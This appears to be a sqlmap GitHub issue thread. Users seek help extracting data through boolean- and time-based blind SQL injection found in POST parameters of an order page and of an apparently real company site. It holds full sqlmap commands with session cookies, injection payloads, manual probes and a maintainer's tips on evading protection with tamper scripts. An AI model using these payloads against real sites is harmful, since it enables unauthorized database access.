Why sqlmap does not take extract..

[SlottoCorleone]

Hi guys

I want to consult about my problem..In my tests sqlmap found a injection point but i could not extract the database names or anything it must be firewall or something i don't know but that is my situation

./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=8gj5e2lo706l8r3q3qtgdk6192" --data="adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013%2015:22:03&toplam=50&urun=386*&userid=164107" --dbs --batch --no-cast

This is the situation

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[11:01:02] [INFO] resuming back-end DBMS 'mysql'
[11:01:02] [INFO] testing connection to the target URL
[11:01:03] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013 15:22:03&toplam=50&urun=386 AND 2875=2875&userid=164107

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013 15:22:03&toplam=50&urun=386 AND SLEEP(3)&userid=164107

---

[11:01:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[11:01:03] [INFO] fetching database names
[11:01:03] [INFO] fetching number of databases
[11:01:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:03] [INFO] retrieved:
[11:01:05] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[11:01:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[11:01:13] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:01:13] [ERROR] unable to retrieve the number of databases
[11:01:13] [INFO] falling back to current database
[11:01:13] [INFO] fetching current database
[11:01:13] [INFO] resumed: \n
available databases [1]:
[*]

[stamparm]

This is most probably a false positive. Are you able to retrieve anything with it? For example, do you get anything usable with --banner?

In case that you do, have you tried to use bigger --time-sec?

I can guess that you've lowered value for --time-sec to 3 in testing phase. My question is why? That way you are just raising probability of getting a false positive.

[SlottoCorleone]

Hi dear stamparm

I have tried everything but all parameters but it's has been failing i think the version of MYSQL 3

When i try urun=-1 and 91=91 otherwise or 91=91 it gaves me you can't do this message but on the other hand

And and 91=73 otherwise or 91=73 or any number if it's not equal shows me a normal page when i try the equal match manuelly it gives me different message and got me redirection to main page..

I am going to try --banner and --time-sec=3 like you said

What can we do with sqlmap for MYSQL 3 do you have any recommendation ? I am not actually sure than the DATABASE Type and Version but i got that idea suddenly after my tests that is results..

./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=toiktqq6phvchisgm3143f7t97" --data="adet=1&fiyat=106.5&kredi=0&rak=0&tarih=08.05.2013%2014:25:04&toplam=106.5&urun=-1*&userid=164328" --batch --banner --time-sec=3

sqlmap/1.0-dev-03be419 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:53:18

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[08:53:18] [INFO] resuming back-end DBMS 'mysql'
[08:53:18] [INFO] testing connection to the target URL
[08:53:26] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND 1439=1439&userid=36366

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND SLEEP(3)&userid=36366

---

[08:53:26] [INFO] the back-end DBMS is MySQL
[08:53:26] [INFO] fetching banner
[08:53:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:53:26] [INFO] retrieved:
[09:02:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[09:04:23] [INFO] retrieved:
[09:04:23] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

web application technology: Apache
back-end DBMS: MySQL 5.0.11
[09:05:20] [INFO] fetching banner
[09:05:20] [INFO] retrieved:
[09:15:04] [INFO] retrieved:
[09:15:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None

What can i do more i don't know need your help really..

[stamparm]

That SLEEP function was added in MySQL 5.0.12. So, in your case, if positive, you are dealing with MySQL 5

You said:
And and 91=73 otherwise or 91=73 or any number if it's not equal shows me a normal page when i try the equal match manuelly it gives me different message and got me redirection to main page..

In that case, you need to make sqlmap work for boolean SQLi. You can try to use --text-only --technique=B

[SlottoCorleone]

Thanks for fast reply

Yes i guess you are right it's SQLi.. I tried what you said it's still failing..

./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=toiktqq6phvchisgm3143f7t97" --data="adet=1&fiyat=106.5&kredi=0&rak=0&tarih=08.05.2013%2014:25:04&toplam=106.5&urun=-1*&userid=164328" --batch --banner --text-only --technique=B

sqlmap/1.0-dev-03be419 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:34:37

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[09:34:37] [INFO] resuming back-end DBMS 'mysql'
[09:34:38] [INFO] testing connection to the target URL
[09:34:41] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause

Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND 1439=1439&userid=36366

[09:34:41] [INFO] the back-end DBMS is MySQL
[09:34:41] [INFO] fetching banner
[09:34:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:34:41] [INFO] retrieved:
[09:38:26] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

web application technology: Apache
back-end DBMS: MySQL 5.0.11
[09:42:40] [INFO] fetching banner
[09:42:40] [INFO] retrieved:
[09:44:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None

[stamparm]

Ok. This proves that the site is vulnerable. It's highly unprobable that both time-based and boolean-based blind are false positives here.

I would suggest you to use --no-case. In case that this still fails, you are probably dealing with a site having some kind of protection. Here I can't help you a lot. You'll need to find out is there anything that could help you out here.

For example, maybe this helps:
--tamper=between

[SlottoCorleone]

Okey i finally found a result i think i must do it manuel because i am having problems with authaction i guess i checked it found the exact time manuel miroslav i did and sleep(33) the server waited for 33 seconds after i did it as and sleep(20) waited 20 seconds now i tried manuelly for and 91=91 it gives me true page and after and 91=73 and any number give me another page but page comes HTTP 200 Just errors different for example TRUE PAGE is always give that result

"PROBLEM 4" but FALSE Position Always give "PROBLEM 2" as a text

Also you can give me manuel syntax stamparm i can check it immediatly for example how can i find version or something manuelly i tried AND substring(version(),1,1)=5 also 4 it gives me "PROBLEM 2" I mean how can i sure is there a injectiion or not ?
May i send mail for more information stamparm if you don't mind ?

Thanks

[stamparm]

Can you please send me a traffic.txt file to [email protected] resulting from the following run:

python sqlmap.py -u "....." -t traffic.txt --technique=BEU --text-only

[ankerfeng]

have you fix that problem , and I have the thame, for example the next code:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: version
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: partnerid=yundaapp&version=3.68.00') AND 5998=5998 AND ('DeEj'='DeEj&data=eyJzdGFydFRpbWUiOjE0MTQ4MjI2MjA2MDcsImVuZFRpbWUiOjE0MTY1NTA2MjA2MDcsImN1c3Rv
bWVySWQiOiJlNzQyNmYwNTYzZWE0MzZhOTY2N2ZlZWE3YzdhOTczMyJ9

&request=orderQuery&validation=082f85da214aa1b909a7fada54672c28

[14:54:20] [INFO] the back-end DBMS is MySQL
[14:54:20] [INFO] fetching banner
[14:54:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:54:20] [INFO] retrieved:
[14:54:21] [INFO] heuristics detected web page charset 'ascii'
dIIEE### IE%#$ J IIEE##%* IEE)OIEJ ### IEE## IE(EE%%%## %EEE%IIJ IIEEEIJ IEJ %J %* %%EEz K%S ###%EEEEIIES %J %#/#%EE%#%z IIEIEEE%## IIE%%%F EEAE
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: MySQL 5

banner:

�dIIEE###���
IE%#$ J
IIEE##%*
IEE)OIEJ��������###���
IEE##��
IE(EE%%%##������%EEE%IIJ

IIEEEIJ��IEJ�������%J�%*�%%EEz�K%S�###%EEEEIIES�%J����%#/#%EE%#%z   IIEIEEE%##��������  IIE%%%F
EEAE

---

[14:57:41] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 943 times
[14:57:41] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/mobi.yundasys.com'


[stamparm]

@imfenghui in your case it certainly seems like a false positive. "Fix" it with --flush-session

[ankerfeng]

can I send a traffic.txt file to [email protected]

[ankerfeng]

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: partnerid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: partnerid=yundaapp AND 5393=5393&version=3.68.00&data=eyJzdGFydFRpbWUiOjE0MTQ4MjI2MjA2MDcsImVuZFRpbWUiOjE0MTY1NTA2MjA2MDcsImN1c3Rv
bWVySWQiOiJlNzQyNmYwNTYzZWE0MzZhOTY2N2ZlZWE3YzdhOTczMyJ9

&request=orderQuery&validation=082f85da214aa1b909a7fada54672c28

[15:31:42] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:31:42] [INFO] the back-end DBMS is MySQL
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: MySQL 5.0.11
[15:31:42] [INFO] fetching database names
[15:31:42] [INFO] fetching number of databases
[15:31:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:31:42] [INFO] retrieved:
[15:31:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:31:43] [ERROR] unable to retrieve the number of databases
[15:31:43] [INFO] falling back to current database
[15:31:43] [INFO] fetching current database
[15:31:43] [INFO] retrieved:
[15:31:43] [INFO] heuristics detected web page charset 'ascii'

[stamparm]

@imfenghui I wouldn't see one thing usable as it's a boolean based blind. Also, payload like partnerid=yundaapp AND 5393... for sure looks like a false-positive

[ankerfeng]

thank for your advice, i think it false-positive .

[angelz12]

nope i got the same

Von: 麋鹿迷路的迷 [mailto:[email protected]]
Gesendet: Freitag, 21. November 2014 08:02
An: sqlmapproject/sqlmap
Betreff: Re: [sqlmap] Why sqlmap does not take extract.. (#448)

have you fix that problem , and I have the thame, for example the next code:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: version
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: partnerid=yundaapp&version=3.68.00') AND 5998=5998 AND ('DeEj'='DeEj&data=eyJzdGFydFRpbWUiOjE0MTQ4MjI2MjA2MDcsImVuZFRpbWUiOjE0MTY1NTA2MjA2MDcsImN1c3Rv
bWVySWQiOiJlNzQyNmYwNTYzZWE0MzZhOTY2N2ZlZWE3YzdhOTczMyJ9

&request=orderQuery&validation=082f85da214aa1b909a7fada54672c28

[14:54:20] [INFO] the back-end DBMS is MySQL
[14:54:20] [INFO] fetching banner
[14:54:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:54:20] [INFO] retrieved:
[14:54:21] [INFO] heuristics detected web page charset 'ascii'
dIIEE### IE%#$ J IIEE##%* IEE)OIEJ ### IEE## IE(EE%%%## %EEE%IIJ IIEEEIJ IEJ %J %* %%EEz K%S ###%EEEEIIES %J %#/#%EE%#%z IIEIEEE%## IIE%%%F EEAE
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: MySQL 5

banner:

dIIEE###
IE%#$ J
IIEE##%*
IEE)OIEJ###
IEE##
IE(EE%%%##%EEE%IIJ

IIEEEIJIEJ%J%*%%EEzK%S###%EEEEIIES%J%#/#%EE%#%z IIEIEEE%## IIE%%%F
EEAE

---

[14:57:41] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 943 times
[14:57:41] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/mobi.yundasys.com'

—
Reply to this email directly or view it on GitHub #448 (comment) .Das Bild wurde vom Absender entfernt.